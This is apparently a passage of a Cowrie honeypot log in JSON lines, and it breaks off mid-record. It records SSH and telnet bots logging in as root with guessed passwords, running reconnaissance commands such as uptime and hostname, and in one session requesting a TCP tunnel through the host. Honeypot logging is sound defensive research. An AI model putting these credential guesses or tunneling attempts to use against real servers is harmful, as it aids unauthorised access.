{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T08:32:24.911195Z","src_ip":"212.227.235.229","session":"7fe04884da5a"}
{"eventid":"cowrie.login.success","username":"root","password":"mobi","message":"login attempt [root/mobi] succeeded","sensor":"my-vps","timestamp":"2025-08-31T08:32:25.520706Z","src_ip":"212.227.125.160","session":"997db9e7df7f"}
{"eventid":"cowrie.login.failed","username":"dennis","password":"dennis","message":"login attempt [dennis/dennis] failed","sensor":"my-vps","timestamp":"2025-08-31T08:32:26.611547Z","src_ip":"212.227.235.229","session":"7fe04884da5a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T08:32:28.346530Z","src_ip":"212.227.125.160","session":"997db9e7df7f"}
{"eventid":"cowrie.command.input","input":"history | tail -5","message":"CMD: history | tail -5","sensor":"my-vps","timestamp":"2025-08-31T08:32:28.347289Z","src_ip":"212.227.125.160","session":"997db9e7df7f"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/3b6409aecd4af0f82f5af0e783a29453ca4bca7e2fda26224a53d480b46ae991","size":28,"shasum":"3b6409aecd4af0f82f5af0e783a29453ca4bca7e2fda26224a53d480b46ae991","duplicate":true,"duration":"1.5","message":"Closing TTY Log: var/lib/cowrie/tty/3b6409aecd4af0f82f5af0e783a29453ca4bca7e2fda26224a53d480b46ae991 after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T08:32:29.796924Z","src_ip":"212.227.125.160","session":"997db9e7df7f"}
{"eventid":"cowrie.session.closed","duration":"9.8","message":"Connection lost after 9.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T08:32:29.838277Z","src_ip":"212.227.125.160","session":"997db9e7df7f"}
{"eventid":"cowrie.session.connect","src_ip":"201.148.180.50","src_port":35312,"dst_ip":"1.2.3.4","dst_port":22,"session":"6f28da17e4ed","protocol":"ssh","message":"New connection: 201.148.180.50:35312 (1.2.3.4:22) [session: 6f28da17e4ed]","sensor":"my-vps","timestamp":"2025-08-31T08:32:38.248905Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T08:32:39.090973Z","src_ip":"201.148.180.50","session":"6f28da17e4ed"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T08:32:39.091643Z","src_ip":"201.148.180.50","session":"6f28da17e4ed"}
{"eventid":"cowrie.login.success","username":"root","password":"mobi","message":"login attempt [root/mobi] succeeded","sensor":"my-vps","timestamp":"2025-08-31T08:32:44.491472Z","src_ip":"201.148.180.50","session":"6f28da17e4ed"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T08:32:46.833051Z","src_ip":"201.148.180.50","session":"6f28da17e4ed"}
{"eventid":"cowrie.command.input","input":"ssh -V","message":"CMD: ssh -V","sensor":"my-vps","timestamp":"2025-08-31T08:32:46.833835Z","src_ip":"201.148.180.50","session":"6f28da17e4ed"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/8737483f9dc335904b0dacf8467784c20ab36ded9ac9b78bd025cc0566b8caff","size":58,"shasum":"8737483f9dc335904b0dacf8467784c20ab36ded9ac9b78bd025cc0566b8caff","duplicate":true,"duration":"1.4","message":"Closing TTY Log: var/lib/cowrie/tty/8737483f9dc335904b0dacf8467784c20ab36ded9ac9b78bd025cc0566b8caff after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T08:32:48.227664Z","src_ip":"201.148.180.50","session":"6f28da17e4ed"}
{"eventid":"cowrie.session.closed","duration":"10.0","message":"Connection lost after 10.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T08:32:48.228839Z","src_ip":"201.148.180.50","session":"6f28da17e4ed"}
{"eventid":"cowrie.session.closed","duration":"120.0","message":"Connection lost after 120.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T08:33:27.097621Z","src_ip":"43.224.126.107","session":"c82fc6dfa112"}
{"eventid":"cowrie.session.closed","duration":"120.0","message":"Connection lost after 120.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T08:34:24.673916Z","src_ip":"212.227.235.229","session":"7fe04884da5a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":32835,"dst_ip":"1.2.3.4","dst_port":23,"session":"ff932395b0ed","protocol":"telnet","message":"New connection: 212.227.235.229:32835 (1.2.3.4:23) [session: ff932395b0ed]","sensor":"my-vps","timestamp":"2025-08-31T08:35:59.465094Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":51862,"dst_ip":"1.2.3.4","dst_port":23,"session":"63c82acb300e","protocol":"telnet","message":"New connection: 212.227.235.229:51862 (1.2.3.4:23) [session: 63c82acb300e]","sensor":"my-vps","timestamp":"2025-08-31T08:35:59.467990Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":36487,"dst_ip":"1.2.3.4","dst_port":23,"session":"90e6353cf420","protocol":"telnet","message":"New connection: 212.227.235.229:36487 (1.2.3.4:23) [session: 90e6353cf420]","sensor":"my-vps","timestamp":"2025-08-31T08:36:00.497159Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":48435,"dst_ip":"1.2.3.4","dst_port":23,"session":"094edafe5abc","protocol":"telnet","message":"New connection: 212.227.125.160:48435 (1.2.3.4:23) [session: 094edafe5abc]","sensor":"my-vps","timestamp":"2025-08-31T08:36:01.425822Z"}
{"eventid":"cowrie.session.closed","duration":46.24959444999695,"message":"Connection lost after 46 seconds","sensor":"my-vps","timestamp":"2025-08-31T08:36:45.714619Z","src_ip":"212.227.235.229","session":"ff932395b0ed"}
{"eventid":"cowrie.session.closed","duration":46.25340437889099,"message":"Connection lost after 46 seconds","sensor":"my-vps","timestamp":"2025-08-31T08:36:45.721347Z","src_ip":"212.227.235.229","session":"63c82acb300e"}
{"eventid":"cowrie.session.closed","duration":46.23878073692322,"message":"Connection lost after 46 seconds","sensor":"my-vps","timestamp":"2025-08-31T08:36:46.735876Z","src_ip":"212.227.235.229","session":"90e6353cf420"}
{"eventid":"cowrie.session.closed","duration":46.29642963409424,"message":"Connection lost after 46 seconds","sensor":"my-vps","timestamp":"2025-08-31T08:36:47.722183Z","src_ip":"212.227.125.160","session":"094edafe5abc"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":53474,"dst_ip":"1.2.3.4","dst_port":23,"session":"ac1ad83a68a7","protocol":"telnet","message":"New connection: 212.227.235.229:53474 (1.2.3.4:23) [session: ac1ad83a68a7]","sensor":"my-vps","timestamp":"2025-08-31T08:37:18.173416Z"}
{"eventid":"cowrie.session.closed","duration":36.41301488876343,"message":"Connection lost after 36 seconds","sensor":"my-vps","timestamp":"2025-08-31T08:37:54.586336Z","src_ip":"212.227.235.229","session":"ac1ad83a68a7"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":59914,"dst_ip":"1.2.3.4","dst_port":22,"session":"478dc6252003","protocol":"ssh","message":"New connection: 217.72.205.35:59914 (1.2.3.4:22) [session: 478dc6252003]","sensor":"my-vps","timestamp":"2025-08-31T08:38:09.865395Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T08:38:09.867139Z","src_ip":"217.72.205.35","session":"478dc6252003"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":42530,"dst_ip":"1.2.3.4","dst_port":22,"session":"0a661e7476a4","protocol":"ssh","message":"New connection: 212.227.125.160:42530 (1.2.3.4:22) [session: 0a661e7476a4]","sensor":"my-vps","timestamp":"2025-08-31T08:38:50.346097Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T08:38:51.139470Z","src_ip":"212.227.125.160","session":"0a661e7476a4"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T08:38:51.140186Z","src_ip":"212.227.125.160","session":"0a661e7476a4"}
{"eventid":"cowrie.login.success","username":"root","password":"2","message":"login attempt [root/2] succeeded","sensor":"my-vps","timestamp":"2025-08-31T08:38:56.445285Z","src_ip":"212.227.125.160","session":"0a661e7476a4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T08:39:01.697599Z","src_ip":"212.227.125.160","session":"0a661e7476a4"}
{"eventid":"cowrie.command.input","input":"uptime","message":"CMD: uptime","sensor":"my-vps","timestamp":"2025-08-31T08:39:01.698376Z","src_ip":"212.227.125.160","session":"0a661e7476a4"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/dd291cd6294bafef2a7e9c378eb320e87198d6dae214272addb569775750c802","size":69,"shasum":"dd291cd6294bafef2a7e9c378eb320e87198d6dae214272addb569775750c802","duplicate":true,"duration":"1.3","message":"Closing TTY Log: var/lib/cowrie/tty/dd291cd6294bafef2a7e9c378eb320e87198d6dae214272addb569775750c802 after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T08:39:02.988182Z","src_ip":"212.227.125.160","session":"0a661e7476a4"}
{"eventid":"cowrie.session.closed","duration":"12.6","message":"Connection lost after 12.6 seconds","sensor":"my-vps","timestamp":"2025-08-31T08:39:02.989338Z","src_ip":"212.227.125.160","session":"0a661e7476a4"}
{"eventid":"cowrie.session.connect","src_ip":"201.148.180.50","src_port":55302,"dst_ip":"1.2.3.4","dst_port":22,"session":"35dadde389e4","protocol":"ssh","message":"New connection: 201.148.180.50:55302 (1.2.3.4:22) [session: 35dadde389e4]","sensor":"my-vps","timestamp":"2025-08-31T08:39:09.803167Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T08:39:10.472087Z","src_ip":"201.148.180.50","session":"35dadde389e4"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T08:39:10.473312Z","src_ip":"201.148.180.50","session":"35dadde389e4"}
{"eventid":"cowrie.login.success","username":"root","password":"2","message":"login attempt [root/2] succeeded","sensor":"my-vps","timestamp":"2025-08-31T08:39:14.578686Z","src_ip":"201.148.180.50","session":"35dadde389e4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T08:39:17.714149Z","src_ip":"201.148.180.50","session":"35dadde389e4"}
{"eventid":"cowrie.command.input","input":"hostname","message":"CMD: hostname","sensor":"my-vps","timestamp":"2025-08-31T08:39:17.714894Z","src_ip":"201.148.180.50","session":"35dadde389e4"}
{"eventid":"cowrie.session.connect","src_ip":"176.65.149.186","src_port":42558,"dst_ip":"1.2.3.4","dst_port":23,"session":"d04ff8e48f09","protocol":"telnet","message":"New connection: 176.65.149.186:42558 (1.2.3.4:23) [session: d04ff8e48f09]","sensor":"my-vps","timestamp":"2025-08-31T08:39:18.359873Z"}
{"eventid":"cowrie.login.success","username":"root","password":"adminHW","message":"login attempt [root/adminHW] succeeded","sensor":"my-vps","timestamp":"2025-08-31T08:39:18.397856Z","src_ip":"176.65.149.186","session":"d04ff8e48f09"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T08:39:18.415445Z","src_ip":"176.65.149.186","session":"d04ff8e48f09"}
{"eventid":"cowrie.command.input","input":"1","message":"CMD: 1","sensor":"my-vps","timestamp":"2025-08-31T08:39:18.416345Z","src_ip":"176.65.149.186","session":"d04ff8e48f09"}
{"eventid":"cowrie.command.failed","input":"1","message":"Command not found: 1","sensor":"my-vps","timestamp":"2025-08-31T08:39:18.417110Z","src_ip":"176.65.149.186","session":"d04ff8e48f09"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7063dece7cccf374d9fa1ee30ff23300fa42477e064e69be7bb6d01c0cfff682","size":13,"shasum":"7063dece7cccf374d9fa1ee30ff23300fa42477e064e69be7bb6d01c0cfff682","duplicate":true,"duration":"1.2","message":"Closing TTY Log: var/lib/cowrie/tty/7063dece7cccf374d9fa1ee30ff23300fa42477e064e69be7bb6d01c0cfff682 after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T08:39:18.927163Z","src_ip":"201.148.180.50","session":"35dadde389e4"}
{"eventid":"cowrie.session.closed","duration":"9.1","message":"Connection lost after 9.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T08:39:18.928430Z","src_ip":"201.148.180.50","session":"35dadde389e4"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":46460,"dst_ip":"1.2.3.4","dst_port":23,"session":"2de190ff7685","protocol":"telnet","message":"New connection: 212.227.235.229:46460 (1.2.3.4:23) [session: 2de190ff7685]","sensor":"my-vps","timestamp":"2025-08-31T08:39:59.155988Z"}
{"eventid":"cowrie.login.success","username":"root","password":"adminHW","message":"login attempt [root/adminHW] succeeded","sensor":"my-vps","timestamp":"2025-08-31T08:39:59.337231Z","src_ip":"212.227.235.229","session":"2de190ff7685"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T08:39:59.353375Z","src_ip":"212.227.235.229","session":"2de190ff7685"}
{"eventid":"cowrie.command.input","input":"1","message":"CMD: 1","sensor":"my-vps","timestamp":"2025-08-31T08:39:59.354573Z","src_ip":"212.227.235.229","session":"2de190ff7685"}
{"eventid":"cowrie.command.failed","input":"1","message":"Command not found: 1","sensor":"my-vps","timestamp":"2025-08-31T08:39:59.355492Z","src_ip":"212.227.235.229","session":"2de190ff7685"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":52905,"dst_ip":"1.2.3.4","dst_port":22,"session":"f2e86eb87660","protocol":"ssh","message":"New connection: 212.227.125.160:52905 (1.2.3.4:22) [session: f2e86eb87660]","sensor":"my-vps","timestamp":"2025-08-31T08:41:20.568480Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T08:41:20.569654Z","src_ip":"212.227.125.160","session":"f2e86eb87660"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":53156,"dst_ip":"1.2.3.4","dst_port":22,"session":"78950cc67be5","protocol":"ssh","message":"New connection: 212.227.125.160:53156 (1.2.3.4:22) [session: 78950cc67be5]","sensor":"my-vps","timestamp":"2025-08-31T08:41:20.678904Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T08:41:20.679574Z","src_ip":"212.227.125.160","session":"78950cc67be5"}
{"eventid":"cowrie.client.kex","hassh":"6a77bbd6ef48d6a9959a47aa4a42a505","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 6a77bbd6ef48d6a9959a47aa4a42a505","sensor":"my-vps","timestamp":"2025-08-31T08:41:20.792107Z","src_ip":"212.227.125.160","session":"78950cc67be5"}
{"eventid":"cowrie.login.success","username":"root","password":"broadguam1","message":"login attempt [root/broadguam1] succeeded","sensor":"my-vps","timestamp":"2025-08-31T08:41:21.130386Z","src_ip":"212.227.125.160","session":"78950cc67be5"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"178.20.45.148","dst_port":80,"src_ip":"212.227.125.160","src_port":0,"message":"direct-tcp connection request to 178.20.45.148:80 from 0.0.0.0:0","sensor":"my-vps","timestamp":"2025-08-31T08:41:21.243768Z","session":"78950cc67be5"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/1092f3da081f46047853850eaeeae92393bc1e307b2916a1e6ed70b100fbb2d5","size":524,"shasum":"1092f3da081f46047853850eaeeae92393bc1e307b2916a1e6ed70b100fbb2d5","duplicate":true,"duration":"180.0","message":"Closing TTY Log: var/lib/cowrie/tty/1092f3da081f46047853850eaeeae92393bc1e307b2916a1e6ed70b100fbb2d5 after 180.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T08:42:18.436018Z","src_ip":"176.65.149.186","session":"d04ff8e48f09"}
{"eventid":"cowrie.session.closed","duration":180.08037281036377,"message":"Connection lost after 180 seconds","sensor":"my-vps","timestamp":"2025-08-31T08:42:18.440163Z","src_ip":"176.65.149.186","session":"d04ff8e48f09"}
{"eventid":"cowrie.session.closed","duration":"70.0","message":"Connection lost after 70.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T08:42:30.679837Z","src_ip":"212.227.125.160","session":"78950cc67be5"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/4355a46b19d348dc2f57c046f8ef63d4538ebb936000f3c9ee954a27460dd865","size":524,"shasum":"4355a46b19d348dc2f57c046f8ef63d4538ebb936000f3c9ee954a27460dd865","duplicate":true,"duration":"180.0","message":"Closing TTY Log: var/lib/cowrie/tty/4355a46b19d348dc2f57c046f8ef63d4538ebb936000f3c9ee954a27460dd865 after 180.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T08:42:59.383286Z","src_ip":"212.227.235.229","session":"2de190ff7685"}
{"eventid":"cowrie.session.closed","duration":180.2318844795227,"message":"Connection lost after 180 seconds","sensor":"my-vps","timestamp":"2025-08-31T08:42:59.387796Z","src_ip":"212.227.235.229","session":"2de190ff7685"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":37019,"dst_ip":"1.2.3.4","dst_port":23,"session":"9356808e43b3","protocol":"telnet","message":"New connection: 212.227.235.229:37019 (1.2.3.4:23) [session: 9356808e43b3]","sensor":"my-vps","timestamp":"2025-08-31T08:43:48.363465Z"}
{"eventid":"cowrie.session.connect","src_ip":"176.65.149.186","src_port":43562,"dst_ip":"1.2.3.4","dst_port":23,"session":"98b732f7e98d","protocol":"telnet","message":"New connection: 176.65.149.186:43562 (1.2.3.4:23) [session: 98b732f7e98d]","sensor":"my-vps","timestamp":"2025-08-31T08:44:18.537038Z"}
{"eventid":"cowrie.login.success","username":"root","password":"admin","message":"login attempt [root/admin] succeeded","sensor":"my-vps","timestamp":"2025-08-31T08:44:18.575441Z","src_ip":"176.65.149.186","session":"98b732f7e98d"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T08:44:18.594193Z","src_ip":"176.65.149.186","session":"98b732f7e98d"}
{"eventid":"cowrie.command.input","input":"1","message":"CMD: 1","sensor":"my-vps","timestamp":"2025-08-31T08:44:18.595330Z","src_ip":"176.65.149.186","session":"98b732f7e98d"}
{"eventid":"cowrie.command.failed","input":"1","message":"Command not found: 1","sensor":"my-vps","timestamp":"2025-08-31T08:44:18.596174Z","src_ip":"176.65.149.186","session":"98b732f7e98d"}
{"eventid":"cowrie.session.closed","duration":31.256339073181152,"message":"Connection lost after 31 seconds","sensor":"my-vps","timestamp":"2025-08-31T08:44:19.619737Z","src_ip":"212.227.235.229","session":"9356808e43b3"}
{"eventid":"cowrie.session.connect","src_ip":"185.156.73.233","src_port":50108,"dst_ip":"1.2.3.4","dst_port":22,"session":"2096306d43a4","protocol":"ssh","message":"New connection: 185.156.73.233:50108 (1.2.3.4:22) [session: 2096306d43a4]","sensor":"my-vps","timestamp":"2025-08-31T08:44:55.257369Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-OpenSSH_8.4p1 Debian-5+deb11u3","message":"Remote SSH version: SSH-2.0-OpenSSH_8.4p1 Debian-5+deb11u3","sensor":"my-vps","timestamp":"2025-08-31T08:44:55.258536Z","src_ip":"185.156.73.233","session":"2096306d43a4"}
{"eventid":"cowrie.client.kex","hassh":"390ffe68a68c2a2891210413e80689fa","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,aes128-cbc;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none,zlib@openssh.com,zlib","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-